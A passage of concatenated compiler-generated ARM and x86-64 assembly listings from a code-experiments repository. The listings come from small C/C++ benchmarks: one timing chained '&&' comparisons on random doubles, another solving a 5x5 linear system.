movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand.cpp, .Ltmp17-_GLOBAL__sub_I_andand.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 15,020
|
exp/cpp_and_and/ARMv7/s/andand_double.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand_double.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #8192
movt r8, #1953
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0
add r0, r4, r5
add r5, r5, #8
vcvt.f64.s32 d16, s0
cmp r5, r8
vstr d16, [r0]
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
vmov.f64 d16, #1.000000e+00
movw r0, #8168
movt r0, #1953
.LBB0_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
vldr d17, [r1]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #8]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #16]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
vldr d17, [r1, #24]
vcmpe.f64 d17, d16
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #8
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv
.LBB0_18: @ %_ZNSt6vectorIdSaIdEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIdSaIdEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand_double.cpp,%function
_GLOBAL__sub_I_andand_double.cpp: @ @_GLOBAL__sub_I_andand_double.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand_double.cpp, .Ltmp17-_GLOBAL__sub_I_andand_double.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand_double.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 7,496
|
exp/static_c/exp/intel_asm/exp_volatile_a_static_b.s
|
.file "exp_volatile_a_static_b.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC6:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
.long 2233382994
.long 1075335659
.long 2405181686
.long 1075869122
.long 343597384
.long 1072777134
.long 3779571220
.long 1075975290
.long 1374389535
.long 1073815224
.long 1202590843
.long -1071940895
.section .text.unlikely,"ax",@progbits
.LCOLDB7:
.section .text.startup,"ax",@progbits
.LHOTB7:
.p2align 4,,15
.globl main
.type main, @function
main:
.LFB22:
.cfi_startproc
subq $328, %rsp
.cfi_def_cfa_offset 336
movl $.LC0, %esi
movl $25, %ecx
movq %fs:40, %rax
movq %rax, 312(%rsp)
xorl %eax, %eax
leaq 112(%rsp), %rdi
movl $5, %eax
rep movsq
movl $.LC6, %esi
movl $1, %edi
movsd 112(%rsp), %xmm7
movsd 120(%rsp), %xmm5
movsd %xmm7, 72(%rsp)
movsd 128(%rsp), %xmm15
movsd 136(%rsp), %xmm10
movsd 144(%rsp), %xmm7
movsd 152(%rsp), %xmm4
movsd %xmm7, 48(%rsp)
movsd 160(%rsp), %xmm1
movsd 168(%rsp), %xmm9
movsd 176(%rsp), %xmm11
movsd 184(%rsp), %xmm13
movsd 192(%rsp), %xmm0
movsd 200(%rsp), %xmm2
movsd 208(%rsp), %xmm7
movsd 216(%rsp), %xmm12
movsd 224(%rsp), %xmm14
movsd 232(%rsp), %xmm3
movsd %xmm5, 80(%rsp)
movsd 240(%rsp), %xmm6
movsd %xmm4, 88(%rsp)
movsd %xmm0, 96(%rsp)
movsd %xmm3, 104(%rsp)
movsd 248(%rsp), %xmm3
movsd 256(%rsp), %xmm4
movsd 264(%rsp), %xmm0
movsd 272(%rsp), %xmm5
movsd %xmm5, 8(%rsp)
movsd 280(%rsp), %xmm5
movsd %xmm5, (%rsp)
movsd 288(%rsp), %xmm5
movsd 296(%rsp), %xmm8
movsd %xmm5, 16(%rsp)
movsd 304(%rsp), %xmm5
movsd %xmm8, 24(%rsp)
mulsd %xmm0, %xmm8
mulsd %xmm5, %xmm4
mulsd %xmm5, %xmm11
mulsd %xmm5, %xmm6
mulsd %xmm5, %xmm12
subsd %xmm8, %xmm4
movsd 24(%rsp), %xmm8
mulsd %xmm5, %xmm3
mulsd %xmm13, %xmm8
mulsd %xmm5, %xmm7
mulsd %xmm5, %xmm9
mulsd %xmm5, %xmm2
subsd %xmm8, %xmm11
movsd (%rsp), %xmm8
mulsd %xmm5, %xmm1
mulsd %xmm0, %xmm8
mulsd %xmm5, %xmm10
mulsd %xmm5, %xmm15
subsd %xmm8, %xmm6
movsd 16(%rsp), %xmm8
movsd %xmm6, 32(%rsp)
movsd 24(%rsp), %xmm6
mulsd %xmm14, %xmm6
subsd %xmm6, %xmm12
movapd %xmm8, %xmm6
mulsd %xmm0, %xmm6
subsd %xmm6, %xmm3
movapd %xmm8, %xmm6
movsd %xmm3, 40(%rsp)
movapd %xmm8, %xmm3
mulsd %xmm14, %xmm3
movsd 40(%rsp), %xmm8
subsd %xmm3, %xmm7
movapd %xmm8, %xmm3
mulsd %xmm12, %xmm3
mulsd %xmm4, %xmm7
subsd %xmm3, %xmm7
movapd %xmm6, %xmm3
mulsd %xmm13, %xmm3
subsd %xmm3, %xmm9
movapd %xmm8, %xmm3
movsd (%rsp), %xmm8
mulsd %xmm11, %xmm3
movapd %xmm8, %xmm6
mulsd %xmm4, %xmm9
mulsd %xmm13, %xmm6
subsd %xmm3, %xmm9
movapd %xmm8, %xmm3
subsd %xmm6, %xmm1
movapd %xmm15, %xmm8
mulsd %xmm14, %xmm3
mulsd %xmm4, %xmm1
subsd %xmm3, %xmm2
movsd 32(%rsp), %xmm3
mulsd %xmm12, %xmm3
mulsd %xmm4, %xmm2
subsd %xmm3, %xmm2
movapd %xmm2, %xmm3
movsd 32(%rsp), %xmm2
movsd %xmm3, 56(%rsp)
mulsd %xmm11, %xmm2
subsd %xmm2, %xmm1
movapd %xmm3, %xmm2
mulsd %xmm9, %xmm2
mulsd %xmm7, %xmm1
subsd %xmm2, %xmm1
movsd 48(%rsp), %xmm2
movapd %xmm2, %xmm15
movsd %xmm1, 64(%rsp)
movsd 24(%rsp), %xmm1
mulsd %xmm2, %xmm1
subsd %xmm1, %xmm10
movsd .LC1(%rip), %xmm1
mulsd %xmm5, %xmm1
movapd %xmm1, %xmm3
movsd .LC2(%rip), %xmm1
mulsd %xmm0, %xmm1
subsd %xmm1, %xmm3
movsd 16(%rsp), %xmm1
mulsd %xmm2, %xmm1
movsd .LC3(%rip), %xmm2
mulsd %xmm5, %xmm2
subsd %xmm1, %xmm8
movsd 40(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm8
subsd %xmm1, %xmm8
movsd .LC2(%rip), %xmm1
mulsd %xmm14, %xmm1
subsd %xmm1, %xmm2
movapd %xmm12, %xmm1
mulsd %xmm3, %xmm1
mulsd %xmm4, %xmm2
subsd %xmm1, %xmm2
movsd 80(%rsp), %xmm1
mulsd %xmm5, %xmm1
movapd %xmm1, %xmm6
movsd (%rsp), %xmm1
mulsd %xmm15, %xmm1
movsd 56(%rsp), %xmm15
mulsd %xmm8, %xmm15
subsd %xmm1, %xmm6
movsd 32(%rsp), %xmm1
mulsd %xmm10, %xmm1
mulsd %xmm4, %xmm6
subsd %xmm1, %xmm6
mulsd %xmm7, %xmm6
subsd %xmm15, %xmm6
movsd .LC4(%rip), %xmm15
mulsd %xmm5, %xmm15
movapd %xmm15, %xmm1
movsd .LC2(%rip), %xmm15
mulsd 8(%rsp), %xmm0
mulsd %xmm13, %xmm15
mulsd 8(%rsp), %xmm14
mulsd 8(%rsp), %xmm13
subsd %xmm15, %xmm1
movapd %xmm11, %xmm15
mulsd %xmm3, %xmm15
mulsd %xmm4, %xmm1
subsd %xmm15, %xmm1
movapd %xmm9, %xmm15
mulsd %xmm2, %xmm15
mulsd %xmm7, %xmm1
subsd %xmm15, %xmm1
movsd 104(%rsp), %xmm15
mulsd %xmm5, %xmm15
subsd %xmm0, %xmm15
movsd 96(%rsp), %xmm0
mulsd %xmm5, %xmm0
mulsd %xmm15, %xmm12
mulsd %xmm15, %xmm11
subsd %xmm14, %xmm0
movapd %xmm0, %xmm14
movsd .LC5(%rip), %xmm0
mulsd %xmm4, %xmm14
mulsd %xmm5, %xmm0
subsd %xmm12, %xmm14
movsd 88(%rsp), %xmm12
mulsd %xmm5, %xmm12
mulsd %xmm14, %xmm9
subsd %xmm13, %xmm12
movsd 48(%rsp), %xmm13
mulsd %xmm4, %xmm12
subsd %xmm11, %xmm12
movapd %xmm13, %xmm11
mulsd %xmm7, %xmm12
subsd %xmm9, %xmm12
movsd .LC2(%rip), %xmm9
mulsd %xmm13, %xmm9
movsd 8(%rsp), %xmm13
mulsd %xmm13, %xmm11
subsd %xmm9, %xmm0
movapd %xmm10, %xmm9
mulsd %xmm15, %xmm10
mulsd %xmm3, %xmm9
mulsd %xmm4, %xmm0
subsd %xmm9, %xmm0
movapd %xmm8, %xmm9
mulsd %xmm14, %xmm8
mulsd %xmm2, %xmm9
mulsd %xmm7, %xmm0
subsd %xmm9, %xmm0
movapd %xmm6, %xmm9
mulsd %xmm12, %xmm6
mulsd %xmm1, %xmm9
mulsd 64(%rsp), %xmm0
subsd %xmm9, %xmm0
movsd 72(%rsp), %xmm9
mulsd %xmm5, %xmm9
subsd %xmm11, %xmm9
movsd 64(%rsp), %xmm11
mulsd %xmm4, %xmm9
subsd %xmm10, %xmm9
movsd 56(%rsp), %xmm10
mulsd %xmm7, %xmm9
subsd %xmm8, %xmm9
mulsd %xmm11, %xmm9
subsd %xmm6, %xmm9
movsd (%rsp), %xmm6
divsd %xmm9, %xmm0
mulsd %xmm0, %xmm12
mulsd %xmm0, %xmm14
mulsd %xmm0, %xmm15
subsd %xmm12, %xmm1
subsd %xmm14, %xmm2
subsd %xmm15, %xmm3
divsd %xmm11, %xmm1
mulsd %xmm1, %xmm10
mulsd %xmm1, %xmm6
subsd %xmm10, %xmm2
divsd %xmm7, %xmm2
movsd 32(%rsp), %xmm7
mulsd %xmm1, %xmm7
subsd %xmm7, %xmm3
movsd 40(%rsp), %xmm7
mulsd %xmm2, %xmm7
subsd %xmm7, %xmm3
movsd .LC2(%rip), %xmm7
divsd %xmm4, %xmm3
movapd %xmm13, %xmm4
mulsd %xmm0, %xmm4
subsd %xmm4, %xmm7
movapd %xmm7, %xmm4
subsd %xmm6, %xmm4
movsd 16(%rsp), %xmm6
mulsd %xmm2, %xmm6
subsd %xmm6, %xmm4
movsd 24(%rsp), %xmm6
mulsd %xmm3, %xmm6
subsd %xmm6, %xmm4
divsd %xmm5, %xmm4
call __printf_chk
movq 312(%rsp), %rdx
xorq %fs:40, %rdx
jne .L5
xorl %eax, %eax
addq $328, %rsp
.cfi_remember_state
.cfi_def_cfa_offset 8
ret
.L5:
.cfi_restore_state
call __stack_chk_fail
.cfi_endproc
.LFE22:
.size main, .-main
.section .text.unlikely
.LCOLDE7:
.section .text.startup
.LHOTE7:
.section .rodata.cst8,"aM",@progbits,8
.align 8
.LC1:
.long 343597384
.long -1071757394
.align 8
.LC2:
.long 2748779069
.long -1073201808
.align 8
.LC3:
.long 3607772529
.long -1071615837
.align 8
.LC4:
.long 1546188227
.long 1075364495
.align 8
.LC5:
.long 3779571220
.long 1074795642
.ident "GCC: (Ubuntu 5.4.1-2ubuntu1~16.04) 5.4.1 20160904"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 6,498
|
exp/static_c/exp/intel_asm/exp_triangular_matrix.s
|
.file "exp_triangular_matrix.c"
.section .rodata.str1.1,"aMS",@progbits,1
.LC7:
.string "%f, %f, %f, %f, %f\n"
.section .rodata
.align 32
.LC0:
.long 858993459
.long 1075524403
.long 858993459
.long -1072155853
.long 3435973837
.long -1076048692
.long 171798692
.long 1075880919
.long 1030792151
.long -1071425782
.long 2920577761
.long -1073684153
.long 1717986918
.long -1073060250
.long 171798692
.long 1074045911
.long 2061584302
.long 1074114068
.long 687194767
.long -1072394404
.long 171798692
.long 1075225559
.long 3607772529
.long 1075146915
.long 2576980378
.long -1073374823
.long 1717986918
.long 1074882150
.long 1889785610
.long -1071838659
.long 2920577761
.long 1075306823
.long 1546188227
.long -1072577905
.long 343597384
.long 1070679982
.long 2061584302
.long -1071862252
